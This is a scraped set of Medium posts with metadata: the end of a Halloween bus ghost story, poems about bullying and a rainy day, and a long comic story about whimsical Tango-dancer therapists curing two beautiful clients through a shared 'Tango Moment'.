As we pull out, I see a shadow outside the bus, moving with it, but there is no one in sight. I hug my bedsheet close to myself. “Hey Jeremy?” I ask him tentatively. “Hmm?” He responds, staring out the window. “What is it that you have planned?” I ask, fearing the answer. Jeremy looks at me, and with a start I realize that something is off. Jeremy then says, “Watch out for The Shadow,” then he melts into a pool of darkness. I scream, but no sound escapes my mouth. I look around the bus, only to find no one left. I head up to the front of the bus and find the bus driver there. She turns to look at me and says “Boo” in the deadliest whisper. And with that, I melt into the darkness. | https://medium.com/@sethmi/1981-halloween-b02c9705f10f | [] | 2020-11-05 05:28:17.549000+00:00 | ['Spooky', 'Halloween', 'Short Story'] |
Bullies | Bullies
Photo by Camellia Yang on Unsplash
Bullies, you know who you are,
cloaked in your finery,
you do not fool me.
I’d recognize you anywhere,
you victimize and blame,
those weaker than you
more vulnerable
you play an ugly game.
Bullies, you must answer to yourselves,
look into the mirror
you cannot live free.
I challenge all of you bullies,
to answer the truth of who you are:
the ugliness of shame.
Bullies, someone must have hurt you,
which you carry deep inside,
so I find myself forgiving you,
in spite of all my pain.
Bullies, you called me unspeakable names,
alleged I was trying to steal your boyfriends,
how could that be true,
unless I possessed some sort of magical power,
a modern-day Mata Hari, far surpassing you.
But these were all lies, untruths,
spoken by the three of you,
two sisters and a redhead,
God is watching you.
Bullies, could you not apologize,
for those transgressions of bygone days.
Why not attempt to reconcile,
and in so doing, change your fate.
Bullies, I await your reply,
I have been waiting forty-two years,
my life was shattered into one thousand pieces,
I will never, ever be the same. | https://medium.com/illumination-curated/bullies-507252d4e61e | ['Amy Pierovich'] | 2020-12-12 05:47:21.227000+00:00 | ['Poetry', 'Pain', 'Forgiveness', 'Truth', 'Bullying'] |
A Rainy Day | Today is a rainy day
a cool, gray,
and a beautiful day
why people don’t like
rainy days
I wonder
The sound of the rain
hitting on the roof
raindrops running
down the windows
and running over
the ground like cats and dogs
the scent of wet soil
lightning and thunder
striking from the sky
the dance performed
between the wind and the trees
Today is a rainy day
a day to enjoy
before the manifestation
of mother nature | https://medium.com/illumination-curated/a-rainy-day-186a5644524e | ['Ivette Cruz'] | 2020-12-22 12:16:47.878000+00:00 | ['Positive Thinking', 'Life', 'Motivation', 'Inspiration', 'Poetry'] |
The Optimal Arousal of Bennie and Yvette, a Love Story | The Optimal Arousal of Bennie and Yvette, a Love Story
‘The middle ground is where life and love dance, where the music is played.’
Photo by Christiana Rivers on Unsplash
“But I LOVE Groynehilda!” Bennie shouted.
How he despaired. Would he ever recover from his bad case of RRE? It would kill his latest relationship, as it had all the others. Few things startled Dr. Ocaramia, but she jumped perceptibly off her mat. It wasn’t due so much to Bennie’s sudden outburst as to the tiny seed-germination of an idea his LOVE shout sparked: how to help this man.
“Love is the answer,” Dr. O said obliquely.
“Oh, I know, I know, Dr. O.”
The vowel repetition momentarily distracted her. How often had she thought that Tango, the thing that she and Bennie and all her clients shared, was a language of soft alphabet sounds, like sand in a breeze or water over pebbles. Tango had no hard boundaries like consonants in English, or other dances.
Before her sat a man of such balanced hard and soft symmetry. It was almost criminal the fabulous looks Bennie possessed. But he suffered, oh, oh, oh how he suffered. Benedict Lucky suffered severely from Don Juan syndrome. He was a lady killer through no fault of his own. There are those who would blame his mother. Then, thought Dr. O, they had best just blame the Great Mother. Dr. O knew that all of us have the DJ gene, located beside the first chakra, but for most of us, it remains dormant. It flared up into an extreme stubborn case for Bennie, partly triggered by his good looks.
“I believe you do . . . LOVE Groynehilda,” Dr. O said, shouting so Bennie knew she had heard him. She was a good listener, a skill that had served her well as a dancer and as a Tango dancer therapist.
Dr. Ocaramia specialized in treating Tango dancers because she had a deep and penetrating understanding of their peculiar disorders and problems. Every single one had a form of TAD, Tango Anxiety Disorder. The dance was a catalyst, like anything that you are passionate about and define your life through. The intensity of intimacy with others was wonderful and devastating at some point in each Tango dancer’s career. But Dr. O knew TAD had to do with what we bring to the partnership. No one can make us suffer but us. Tango, for her clientele, was the ultimate sifter of truth from fiction.
Dr. Ocaramia’s diagnoses for her special clients ran the gamut of the issues of the population at large, all of them rooted and nourished by one cause, Fear. Dr. O wasn’t a trained therapist but had fallen into the practice because of a vow she took years before, to save all beings. “Saving one, you save millions,” she could often be heard muttering in her rare idle moments.
There had been an explosion of disorders, at least in her city, as the Tango community matured and became more complex. Everything from OCD to PTSD to PMS manifested differently in Tango dancers. Dr. Ocaramia could help them all: The woman who had to sleep with her shoes on required only a feng shui correction in her closet. There was the man whose compulsion led him to build a hidden high-heeled shoe cubby in his closet for one-hundred pairs of vintage and recently used women’s Tango shoes.
“What’s wrong with that?” she asked.
She tried to send him away. But he needed six months of talking, researching the history of footwear, penetrating every belief on glamour before he was ready to leave, happy the way he was. He generously gave her his favorite pair, 10-centimeter stilettos in black suede with skimpy sandal foot and thin criss-cross ankle straps.
One woman came with a morbid fear of entering the dance hall and finding someone wearing the same dress. “So bring a change of clothing,” advised Dr. O and sent her away. Another woman had a recurring nightmare of entering the milonga stark naked. Same remedy: “Bring a change of clothing.” She had watched many leave her office-cum-dance-floor freed of their burden. She helped them by using a simple formula: show up, remain present, accept what they offered, and be kind, for the most part.
Bennie fidgeted in his chair. “I’ve been this way forever. I’m always looking at that next woman on the horizon. Always,” Bennie whined. Dr. O noticed that even with his most vulnerable display, he was a knockout. Dr. O relished not being KO’d by him. She had become immune since having Tango satori.
“Have you ever sailed?” she asked.
“Yes, don’t care for it, my idea of nothing to do.”
Dr. O thought of how people prone to seasickness are advised to stare at the horizon. But no, that was a silly thought. She was just gathering wool, remaining present, as Bennie wallowed in his own pain.
“Dr. O, please help me; tell me how to stop . . . to control my RRRE.”
“RRE,” she corrected.
“RRE . . rrrrrr,” he growled and she could see how badly it hurt. “Maybe . . . do you think? . . . I should stop Tango? I’m so tired of being the Casanova.” He raised his big blue eyes with such pleading, she saw instantly how their aqueous sheen could kill a woman. A wavy lock of his sandy hair fell forward temptingly. A jolt of electricity ran through her most tender meridians. She kept a calm façade.
Bennie, don’t worry, you will be saved. In her mind, she clicked on “Save as” in the pull-down menu. He could only be saved as himself. Therein lay the rub.
“Okay, Bennie. Just this once I’ll give you advice. Don’t stop Tango. It’s your poison, but also your medicine. Only you can figure out which to apply. It’s your life or no-life riddle, your koan, which if answered correctly leads to what you want above all else. Answer as you normally do, you get the normal result, pain. Your coming here to talk will clarify all.” Dr. O knew that words were superfluous. Everything we call reality is a form of placebo.
“Tell me again, how many women at last night’s milonga did you fantasize about taking to bed?” Not that the number mattered. It was part of the therapeutic process. In fact, numbers had a markedly adverse effect on Dr. O., removing her from her beloved connection to the faint path leading her client ineluctably from placebo-reality to the illusive moment of truth, the fear-killer that they both hunted.
“Only five,” Bennie answered weakly. He didn’t notice when Dr. O passed out for a nanosecond, her auto-protective device that clicks-in when disconnection occurs caused by the client’s stating, not truth, but numerical values. As she came to, he held up his left hand with his fingers spread in the air. “Zelda, Jillene, Arrabel, Fredericka, and Linguine.”
“Linguine?”
“That’s my name for her. She was thin, lanky, and I could coil her body around me like a giant snake of constrictor-pasta. Oh, man, we did a lot of leg wraps, left, right, and center. Ohhhhh . . . ,” he smiled lewd-a-sciviously. “I don’t recall her real name, but I was hungry at the time.”
“Uh-hummm, I see,” said Dr. O. “And, Groynehilda?”
“She was there. She understands, it’s just a dance, a three-minute love affair with a follower who is a stranger. What makes it so painful is that she trusts me to the core.”
“I see. Groynehilda is an enlightened woman, Mr. Lucky.” She made some mental notes. As she did, Bennie went off talking about his problem. How, after five marriages (Dr. O passed out) he was sure Groynehilda was it. He had met her family and assured her he wanted to marry forever this time, have children. But he had the most stubborn case of Rapidly Roving Eye.
Why was it that the most conventionally beautiful people suffered the most? Dr. O had yet to work that one out. Those with receding chins, small eyes, big noses, bowed legs, acne scars, balding, squat builds, funny butts, or just ordinary features seemed to be somehow vaccinated by their very imperfections against such anguish. But these beauties were fairytales in reverse. They started life with everything and then became miserable. They were the Walking Wounded.
The Walking Healed seemed to always be the protagonist with perceived defects. All it seemed to take for them to radiate that coveted divine beauty that transforms ugly ducklings into swans was the simple love of another. Or even that gourmet version, Self Love. But the beautiful people were led, or misled, to expect too much of themselves.
“Perhaps I need some sort of aversion therapy?” Bennie interrupted her silent speculation.
His desperation was over the top. “I was thinking exactly the opposite,” Dr. O said. She knew how badly he wanted to settle down with Groynehilda. It was hard to find a woman willing to make a commitment these days. “Bennie, when you go home today, indulge yourself. Sit in a quiet place and let thoughts of other women come up. But that’s all. Don’t stop them. Don’t hold on to them. Let them rip.”
“Well . . . if you say so . . .” Bennie looked slightly dubious.
“Oh, and this may sound contradictory, but don’t think too much and don’t, and I mean DO NOT touch yourself during the fantasy.”
“Huh?”
Dr. O was not thinking, but the face of Yvette Baisemoi, her only other client currently, arose in her mind. By some bizarre coincidence, like Bennie’s with his good looks, Yvette was a woman who made Liz Taylor, Ava Gardner, and Sophia Loren look like home girls. Yvette’s suffering was equal to that of Bennie’s and appeared to be caused by the same fear. Dr. O realized what Bennie and Yvette both needed was the same remedy. She would discuss her ideas later with Dr. Nureyev.
Seeing the doubt and bewildered look on Bennie’s face, Dr. O said, “Bennie, story time.”
“There was once a man whose entire life had failed him. Everything had let him down eventually, beginning with Santa Claus and the tooth fairy: his parents, his wife and kids, his belief in Christianity, then Judaism, Islam, then Buddhism, Secular Humanism, Atheism, then Marxism, Communism, sailing, golfing, tennis, voodoo, you name it, even nature and the environment. The man had confided all of his failed searches for happiness to a friend, named Jeremiah, who believed himself to be the man’s sole friend and confidant. The man died at 95, very old, but in good shape until the last week of his life. Even dying failed him. Jeremiah figured, being the man’s only friend, he had better go to the funeral for him. It turned out there were thousands of people at the funeral. The man had thousands of confidants, each one feeling he was the man’s sole friend and confidant in the world. The man had led a full and satisfying life out of being let down and sharing it with the world, one person at a time.”
“It’s an interesting story, Dr. O,” said Bennie, doubt still front and center.
“That man,” Dr. O said, “had, on a rotating basis, faith, doubt, and persistence, and the greatest of those three was doubt. He was never certain of being in the right place, doing the right thing. Never.”
“I see,” said Bennie, “he made a long lifetime out of it.”
“And many friends.” On some level, Dr. O hoped, Bennie understood we can’t change some of our hardware. We can only “Save as . . .” Suddenly, she clapped her hands twice.
“Oh no!” said Bennie. “Dr. N? Please . . . I didn’t mean to doubt . . . I mean, think.”
“Shh.” A pleated curtain in the doorway was drawn aside. A right foot in a butter-soft leather two-tone Hugo Boss shoe was extended forward onto its heel, then rolled soundlessly onto its metatarsals as the left foot pushed a man’s weight forward. It was Dr. Nureyev, dressed in an elegant gray silk Brioni suit. The soft-lavender vest he wore over his pin-striped Canali shirt might have been considered too dandy or Euro by American standards. But Dr. N was a longtime Tango dancer. His complexion glowed like that of a transformed protagonist in a fairytale. In fact, he had recently been reborn.
“Amigo,” Dr. N addressed Bennie.
Dr. O smiled. She had never seen him so relaxed in the old days before he had disappeared for forty days and forty nights. Dr. N was to blame for her immersion in Tango’s mysteries and in the problems and disorders of others. She’d been happy to not-think and dance. But he had been the one to lead her to a place in the dead of winter where she danced into the cosmos with a star dancer, Chilly Wainright. He had videotaped her and Chilly. The video disappeared. It was a lesson in ephemeral art. You can dance Tango. You cannot hold it still. Then Nureyev had disappeared. Only later, did Dr. O learn why.
“You rang, Dr. O?”
Dr. O nodded. “Please, check Bennie’s heart-to-brain ratio.” Dr. O’s office was situated off a big dance floor South of Market (SOMA), the hallowed ground for psychosomatic work.
“Pugliese, DiSarli, or Biagi?”
“Make it Piazzolla,” said Dr. O. “I’ll tell you why later.”
Dr. N said, “C’mon Ben, lead me; you won’t know the difference between me and your latest thrill.”
“Linguine…is the latest,” said Dr. O.
“Believe me, I’ll close my eyes . . . . hmmm nice after shave.”
“Thank you, it’s MOB cologne.”
“MOB?”
“My Own Blend, a mix of citrus, cedar, and heated wood shavings. Women love it.”
“Oh, it’s so heavenly,” said Bennie, inhaling the cloud of Dr. N’s fragrance rousing his senses.
“Righto, Ben. C’mon, stop breathing down my neck. Lead away.”
“Oh, Ben and Dr. N,” said Dr. O, “lots of CBM, please.”
CBM, or contra-body movement, Dr. O knew, was great for high anxiety. It was a tenet of Chinese medicine: When you moved your upper body in opposition to your lower body, it stimulated and scrambled both hemispheres of the brain, releasing confusion. That’s why yoga spinal twists were so calming. Dr. O and Dr. N knew that nothing bled the bad blood like Tango. Nothing.
Bad as Bennie’s RRE was, Dr. O was convinced he would pull through. She had treated a broad assortment of ailments, some easier to treat than they first appeared. Some patients simply needed the right bodywork — be it reiki, acupuncture, acupressure, deep-tissue massage, or a clearing with chiropractic manipulation — to rid them of body armor, that common roadblock to joy. For some people, dream work or Bach flowers were needed. A woman who couldn’t stop counting the Tango beat in her head just needed to learn some yogic breathing and to listen to her heartbeat. “Ah, the rhythm of breath and heartbeat, aha,” said she, “who needs numbers?” Certainly not Dr. O. So elementary. Indeed.
There was the guy who had panic attacks as soon as he crossed the transom of a dance hall. Dr. O gave him a word imbued with power to make him feel like King of the Jungle. He had to say it three times at the threshold. It was Iguazu, a word that held the power of falling water seeking its own level and polishing hard rock to vowel-sound smoothness. That guy came back six months later to tell her how he had forgotten to say it one night and danced his best, no panic attack.
“So now you know?” she said.
“That I never needed that word.”
“Go in peace, your therapy is ended.”
There was the woman who hyper-smelled every possible off-odor: sock lint, mineral-rich sweat, toe jam, and scaly scalps. Another yoga specialist was called in to teach her to separate out the offending molecules from the pleasant ones, using the muscles of her nose and sinuses. Elementary. There was the man who was repulsed by most female body scent, leading him to engage in excessive approach-avoidance behavior while dancing. A rash of whiplash cases in followers was traced to his energetic lead. Aromatherapy, using leading brand perfumes combined with human and animal pheromones helped him become a truly inspired tanguero, able to flip repulsion to attraction during the course of one dance.
Drs. Ocaramia and Nureyev had both been transformed by the alchemical process of Tango and wanted to help others get there. When Dr. N disappeared, it had been to go off into the desert to complete his rebirth. Some people need to do that. Before he vanished, he had inspired Dr. O to start writing The Book of Tango (superfluous words!) and deconstruct true happiness. Which was hard when you did not think too much. Like Dr. N, Dr. O had experienced the Oneness that has no name, no eyes, no ears, no nose, no tongue, no body, no mind, no smell, no taste, no touch, etc. Dr. O did not yet know what that ONE was called.
Bennie and Dr. N were done dancing. Dr. O said, “Well?”
Dr. N nodded, “He’s dancing from his brain. Bennie, my boy, you gotta lead from nothingness, or the heart if that’s where you feel your partner.”
“I know, I know,” Bennie said, vexed, yet calm having just done a lot of CBM.
“So why Piazzolla?” Dr. N asked.
“Because Astor Piazzolla’s music has the purest heart-to-brain ratio. That’s why he didn’t want people to dance to his music,” explained Dr. O.
Bennie sighed and sat down. A bandoneon groaned and Dr. O said, “That’s our cue. Don’t get too comfortable, Bennie, your fifty-five minutes were long ago up.”
“OK. See you next week.” Bennie went to pull out his wallet. Dr. O reminded him to put it away.
“Oh, yes, pay it forward, will do.”
Dr. O didn’t take payment. For a long time now she had been on a divesting trend because it was much closer to bliss. In Tango, the closer the skin and the bone — the fewer things that came between you and your partner — the higher the bliss quotient. But it was not so much that Dr. O didn’t care about money or material things. It was that she was clinically bad with numbers. Little known fact: numbers were for her like Kryptonite for Superman; they robbed her of energy and of her powers. She had gotten through the basic eight-count of Tango only by popping her ears during the lesson as the teacher counted. It’s not that she believed numbers were unimportant — without them we would never have sent men to the moon or have the many wonders of the technological age. But Dr. O was among the chosen few (most of them Tango dancers) who had received the wisdom that other unexplored intelligence now lay where no numbers dared go.
Interestingly, Dr. O had no explanation for the number of physicists, architects, mathematicians, rocket scientists, financial planners, and all the hyper-number people who were attracted to Tango. However, these digitally-inclined guys were able to accomplish another astonishing feat: CMM, Contra-Mind-Movement, a delicious out-of-his-mind moving of body from the heart of his nothingness. Well, that’s how Dr. N explained it.
A few strains of violins cried, followed by a rhythmic bar of Biagi on piano. “That must be Yvette Baisemoi. She’s early,” said Dr. O as Dr. N opened the door. Yvette entered as Bennie was leaving. Drs. O and N did not miss the eye-lock between Bennie and Yvette.
“Dr. O, Dr. N, sorry I’m early. I need to talk. PDQ,” said Yvette.
“Please sit and wait, Yvette, in the anteroom,” said Dr. O. “By Ben. Be good.”
Bennie turned and said, “Hey Dr. O. That 95-year-old man. I’m wondering. Did he try Tango?”
“Ben, what is the essence of Tango?” Dr. O. replied.
Bennie understood. Another koan. He bowed and left.
Drs. O & N, two of the world’s greatest non-thinkers, sat down to discuss their clients. They had fifteen minutes to debrief. They shared a little Malbec in small goblets, a little wine (sometimes whine) to whet the brain, as Aristophanes said.
Dr. N sipped, then said, “So Bennie & Yvette. Has the ring of an Elton John song.”
Dr. O sipped and sighed, too. “Yes.”
“Yvette suffers from ILSE?”
Dr. O nodded. “Incredibly Low Self Esteem.”
Dr. N shook his head. Yvette’s other-worldly beauty was not wasted on him. He had an artistic appreciation for the female form. “It’s confusing, isn’t it? It comes off as superiority complex.”
“Yes,” said Dr. O, “The armor, the shield, the self-defense. This Malbec is extra velvety today.” Dr. O listened for months to Yvette rail against every man she believed to be her equal who did not fall all over her and invite her to dance and remain under her spell. Those who did were obviously not her equal.
Dr. N swirled, sipped, swallowed, and said, “Yes, black velvet. If only you could tear that silly soul-constricting persona off of Yvette, Dr. O. All would be well. Underneath is a good person.”
Dr. O laughed. “You know better, Amigo.” How well he had been born again. “So, which desert?”
“Death Valley.”
“But, of course.”
“I was able to hang out in the many ghost towns and not be seen.”
“You and the video of me on cosmic tour with Chilly Wainright. Thanks a lot, Amigo.” She liked to give him digs. They went right through him.
“Don’t worry, it’ll materialize some day.”
They both knew that things only tend to exist. “How am I supposed to convince people I took a trip around the universe on an old wood floor,” she dug at him again.
“Don’t sweat. With Temple-of-Doom ferocity, I will find it.”
“It’s not the Holy Grail.”
“What is?”
“That which we name.”
He nodded agreement, quaffed, and quipped, “So Yvette is a TAD off, too.”
Dr. O chuckled, drained her goblet and said, “Hardy har. A three-legged dog walks into a bar and says, ‘I’m lookin’ for the man who shot my Paw’.” She stood to leave.
“One bad joke deserves another,” said Dr. N. “Clap twice if you need me.”
When the session started, Yvette asked Dr. O, “Who was that man in the waiting area?”
“You know the oath of client-privacy,” said Dr. O.
“Never mind, I’ll see him at a milonga and find out.”
Dr. O hoped, really hoped, she would.
Yvette launched into her spiel. All the good men not paying her one ounce of attention. Or worse, teasing her, dangling carrots, then dropping the ball or carrot, keeping her at arm’s length, sending mixed messages. Keeping her awake at night, waiting, not knowing, not knowing. The unbearable uncertainty. And then this one and that one who knew they didn’t have a chance with her, started texting her. The utter gall. Yvette didn’t require Dr. O to say a word, just to listen. As she went on in this vein, Dr. O recalled one visit when Yvette had looked real, had forgotten to wear her mask. Her fabulous marble-green eyes shone true as she told of Herman, the one guy she could have, should have, would have stayed with. “Ah, but he’s back in Mahwah.”
Her Man in Mah Way, Dr. O remembered it, like a short story title. Yvette was such an open-and-shut case. If only she knew it herself.
“Oh, Dr. O, I’m so miserable. All I want is a modest life, to be happy, to be free from all this anxiety and not knowing. One good man. That’s all. Is that asking for too much? Really?” Yvette began to cry. Dr. O handed her the ever-ready box of tissues. Yvette sobbed for a full five minutes. Dr. O recalled how arrogant and self-absorbed Yvette had appeared at her intake almost a year ago. Dr. N vetted Yvette, as he always did the initial intake. He sat with them cross-legged facing each other. He took the pulse of the patient as they danced both to DiSarli and Biagi, the respective Kings of Romance and Rhythm. He peered into their eyes and studied their souls, made notes. He had become so good at reading souls, gazing there where no words dared be said or heard. He felt their hearts beat against his heart. He did this to men and women. For one full minute, he and the new patient stared into each other’s eyes. He must have learned this somewhere, back in the Sixties maybe, that the eyes show the strength of the soul. Dr. N’s diagnosis was that Yvette had a major gash in her soul. But nothing that a proper, genuine Tango Moment could not fix. Dr. O was piecing this advice together with Bennie’s problem when Yvette finally stopped crying. The entire box of crumpled tissues lay at her feet.
“I have felt for so long, that what I want is within reach, around the bend, on the horizon,” sniffled Yvette. The horizon again. “And then it slips away. Again.”
“Do you sail?” Dr. O triangulated again.
“Heavens, no.”
“I see. Hmmm.”
“Am I asking too much of life?”
“No,” Dr. O answered. “It’s not asking too much.” She wished, though, that Yvette would ask other questions. And she did.
“Dr. O, do you think I should quit the Tango scene? Juggling chainsaws might be less fraught with peril.” Yvette laughed and even with red puffy eyes was so drop-dead gorgeous.
“You have to follow your heart, Yvette.” Stating the obvious occasionally worked.
“I know, I know. Oh, Dr. O, oh. My heart aches. Nobody knows the troubles I’ve seen.”
Glory hallelujah, Dr. O sang to herself. A bandoneon groaned and Yvette stood to leave.
Dr. O clapped twice and Dr. N appeared. “How about a vals (waltz) before Yvette leaves, to calm her. Plenty of CBM, weight changes, those false weight changes called syncopations . . . and a few chassés to chase away the blues. Make it Soñar y nada más.”
“Quite fitting,” said Dr. N.
As they danced away, Dr. O heard Yvette say, “Oh, Dr. N, you smell wonderful. What is it?”
By and by, Dr. N found Dr. O hanging herself. She was suspended upside down from a bar, in peaceful traction, trying to aerate and nourish the chakras that lay along her spine. Dr. O always did a yoga pose after a few client sessions. She came down when Dr. N called her to consultation. Again, two of the world’s greatest non-thinkers sat down to discuss the pain and agony of their clients. Such Walking Wounded. They scratched their heads, put their hands over their hearts, asked each other, “Have you ever seen two more beautiful people who had it all and were so miserable?”
“Fairytales in reverse,” muttered Dr. O. “I’m telling you.”
“Each looking for a soul mate, not knowing they already possess their missing half,” said Dr. N.
Not knowing. Knot knowing, ran through Dr. O’s mind like a mantra.
“Dr. O,” said Dr. N. “I see the wheels turning. What gives?”
“The Wheel of Fortune is always turning . . . What was that last thing you said?”
“About their missing half?”
“Yes,” said Dr. O. She could get to two without passing out.
“Aha, I see,” said Dr. N. “Two missing halves.”
“Do they ever go to the same milonga?”
“More importantly, how do you hand out a prescription for a TM? Can they cultivate and experience a real Tango Moment?” Drs. O & N knew that all their suffering would come into perspective once they achieved this. The Tango Moment was simply code, symbols like all words, in this case for the God Experience. Dr. O preferred the Latinate Tangotum momentum, because it was a dynamic state.
From the moment they met, Drs. Ocaramia and Nureyev had not thought of each other in earthly terms. They had gone through the metaphysical sieve, like many Tango dancers. Drs. O & N were skilled in the dialogue of body language. Communicating only with alpha waves of their brains, the EKGs of their heartbeat, and the light available to their retinas, Drs. O & N went on to share the wisdom, ideas, concepts running through their hearts and minds. In a fairytale ending, they agreed Bennie and Yvette would meet and complete each other, supply that missing half, and bring eternal bliss, a model for others. But this was real life. Something bigger and better was actually available to both of them. Some tapping in to that absolute. Their private hells could become heavens as easily as it took to take a side step in Tango and exit clock time. Presently, the two not-thinkers switched back to spoken language:
Dr. N: So, yes, for all the Tango they dance, both are lacking the God experience.
Dr. O: Possibly due to their being treated like gods and goddesses all their lives.
Dr. N: Hmmm, I see. Possibly. And yet, like the rest of us mortals they have the wound, the gash in the soul. I looked in and saw it, clear as your bandoneon bell.
Dr. O: Indeed, they both have the crack that lets the light in. Perhaps they need to bleed into each other’s wounds?
Dr. N: It seems so obvious. A homeopathic approach is in order. They are so, so . . . symmetrical.
Dr. O: Indeed, Dr. N, mirror images. If only . . . we could . . .
Dr. N: Hmmm, yes, absolutely. Are you not-thinking what I’m not-thinking?
Drs. O & N: GIVE EACH OTHER A GENUINE TANGO MOMENT.
Dr. O (rubbing her chin where a beard would be were she a man): Uh-huh, um-hmmm.
Dr. N: (Rubbing his seven-hour stubble, leaning forward on his knees): Uh, huh. . .
She triangulated again. Bennie and Yvette each longed for something on the horizon. Inside the Tango Moment there is no horizon; you are IT. TM is characterized by a suspension of longing; the longing is not squashed or killed — that would be violence. But it’s balanced inside a boundless feeling of equanimity. Longing, after all, is our human default mode of being, as long as we are of the flesh. We experience our first, or primal, longing for mother and then it keeps morphing and transferring into and onto other things, in most of us in socially acceptable ways. Our monetary system is built and sustained solely on longing. When longing is vigorously and mindfully concentrated, focused, and channeled into a pointed understanding of life and existence, it is called “way seeking.” Suffering then becomes a subset . . . Dr. O found her head aching; too much thinking. She turned to Dr. N, who seemed on the verge of too much thought, also.
“Why do you believe people can go their whole lives dancing, or doing anything they love or what they believe they are meant to do here on earth and never ever experience the TM or its reasonable facsimile?” she asked.
“Fear. Fear of intimacy kills the possibility for Tango Moments. Fear of not looking good. Fear of losing control kills the moment. The best experience of life occurs the moment we relinquish control.” And fear of being wrong, being found out. Fear that our partner is right — all anti-Tango mind states. Fear and Tango can never cohabitate, especially during a TM.
“ ‘No tears, no fears, no ruined years, no clocks.’ I’ve always adored that line from the time I was sixteen. I wanted to be a Twentieth Century Fox.”
“You are,” complimented Dr. N.
Dr. O wasn’t sure that was a good thing. He continued, “Ah, the Tango Moment is love living momentarily in its purest state without words, without even relationship.”
“If TM = Now, why can’t B + Y access theirs? Maybe through meditation?” she asked.
“Even meditation kills the TM because the life of the Tango Moment is exterminated by pure high-grade consciousness. The TM lives in the middle ground between bliss consciousness and its exact opposite, blatant unconsciousness.”
“Dr. N! My sentiments precisely. An optimal arousal is called for, you mean to say.”
“Too excited and it’s lost; depressed, anxious, and it’s gone. The middle ground is where life and love dance, where the music is played — the stimulus for the Tango Moment.”
“Ah, zee music?” Dr. O liked to channel Dr. Ruth sometimes — she had sent clients to Dr. Ruth. “How could this be? An outside stimulus? Hmmm.”
“An inside stimulus. The music is in us. In a state of either meditation/consciousness or unconsciousness, I can’t hear the bandoneon, therefore no Tango Moment. Also, even in the middle ground thinking kills the moment — even recalling a Tango pattern.”
“Dr. N, No need to state the obvious. I think Yvette and Bennie are custom-made for sharing a TM.”
“Bennie must have no fear of being untrue to his primary love relationship . . . what’s her name? Groin?”
“Please, Dr. N, Not One, Not Two, Not Three. Stop counting. How many times I hafta tell ya.” She slipped into her New Jersey accent. “No primary, no secondary . . .” Dr. O passed out cold. As usual, Dr. N thought she was bored or having a narcoleptic fit. Thus, Dr. O did not hear his last question: “What is the state of mind that is the primordial pool from which the nascent Tango Moment emerges? Is it a contemplative state?”
When Dr. O came to, Dr. N was looking into her eyes. She picked up a conversation they had a year ago. “We are always in a state more or less of longing, which adds to our suffering. We start planning and missing the present momentum. The Don Juans and Dona Juanas suffer thus, fatally driven to search, wonder, wander, search again. The viral longers. These are the real sufferers among us.”
“Dr. O, you don’t think you should reserve the word suffering for those in India, China, Burma, Africa . . . It seems wasted to me on a Dandi like Bennie, with his butter-soft leather shoes, Brioni suits, Canali shirts . . . errrr. . . ” he trailed off and looked down at his own attire. The fact was, Dr. N preferred modest dress, jeans and T-shirt or sports shirt, but Dr. O thought he should dress up for their clients.
Dr. O nodded understandingly. “Dr N, I am not without compassion for those all over the globe suffering torture and deprivation. But I must say, heartless as it sounds, it is within our reach right now to end that physical and mental torture. Those with too little can be fed tomorrow. The tyrants can be stopped. As blessed as are the meek, so are as cursed the mighty, the ninth Beatitude. Do you know who the Dalai Lama feels most sorrow for in this world? The Americans. Yes, we who suffer from epidemic low self-esteem. That is a disease. An ill-at-ease that no one but the sufferer can end. And all those other ills, shortages, torture, brutality, can be traced to low self-esteem in someone. Low self-esteem has the potential to give rise to dictators, satanic leaders, to all kinds of tyranny, and to viral longing.”
“‘Others made me a slave. But I may squeeze the slave out of myself, drop by drop,’ wrote Chekhov.”
“Exactly. Now please, before I get on a soapbox or something, put me at-ease. Let’s Tango. Make it DiSarli’s Nido Gaucho, that song about longing for a paradise lost.”
A week later, when Dr. O heard the bandoneon ring, she knew it was Bennie. She thought she detected some new notes of elation in the groan even before she opened the door and saw Bennie’s face.
“Dr. Ocaramia!” He strode past her to his seat. “You have never looked more beautiful before.”
She had just woken up from a deep sleep, having heard someone on NPR estimate how many stars are in the universe. “Gee, thanks, Ben.”
“Hey, I’m double parked, but no problem. I won’t be staying long.”
She knew why but still wanted to hear it from his mortal mouth. “What gives?”
“Everything gives, Dr. O. Everything. I was going through my routine at the Verdi Club on Thursday night, ticking off the women I wanted . . . well, you know my game better than I, when I spot a new dancer. She makes Liz Taylor, Audrey Hepburn, and Ava Gardner look like home girls.”
“Oh, and what about Sophia Loren?”
“Her, too. Her name is Yvette.”
“Yvette, Yvette . . . ah, yes, Yvette.”
“I don’t know how to explain it. On the one hand it was nothing out of the ordinary. I invited her to dance and it was going well. I led a few ochos, molinetes to the left to the right . . . . And then it was, I can’t find another word, DIVINE. I felt the room, the music, the others around us, all there, but at the same time gone . . . like you always say our feet are planted in the earth but our upper body is in heaven . . . .we were all part of a master plan, and everything was perfect. I felt at once that the story of my life was etched on the heart of another. And at the same time, there were millions of stories passing by, all wonderful, marvelous. Dr. O, I’m at a loss for words. It was like . . . like . . . .”
Dr. O yawned and listened.
Bennie’s eyes were like polished-stars-of-sapphire illuminating the room. “It was like Infinity.”
Dr. O smiled. She adored and worshipped Infinity, a quantity that was really a quality, a figure eight on its side. An ocho.
Dr. O knew the rest of his story but she asked anyway. “And Groynehilda?”
“My beloved she is and will be. The message for me is that life makes sense as it is. I understand the essence of Tango. I cannot stop my RRE, but I can let it be. Groynehilda and I are getting married next week. I understand everything about myself and who I am is who I am. Oh, Dr. O, I owe you so much.”
“No, you didn’t need me.” She yawned again. “Pay it forward. You better move your car.”
Bennie hugged her tightly and left. She was proud of Bennie for cutting to the chase. So often the mistake we make in the West is thinking the catalyst — the material world, be it person, money, house, car — is the happiness. Bennie had not ever considered that Yvette was IT. She was only his gateway.
Dr. O waited in lotus pose. Less than an hour passed. The bandoneon groaned with elation. Drs. N and O opened the door to greet Yvette. “Drs. O and N, my joy knows no words or bounds. Hey, I’m double parked but this will be fast.”
As they stood on the dance floor at the entrance, Yvette sashayed with her imaginary partner and then stood still and said. “I think you know. I have experienced God.”
“All will be well,” said Dr. O.
“That man, Bennie . . .” Yvette looked deeply into Dr. N’s eyes, then into Dr. O’s eyes. They all three had a silent conversation and understood what had occurred. Yvette, too, understood, like Bennie, that the plug is not the electricity. The streambed is not the river. Bennie was merely her gate. Her man in Mahway awaited.
“I talked to Herman last night. We’re going to meet up soon.”
“Oh, ah, sounds serious,” Drs. O and N cooed in tandem.
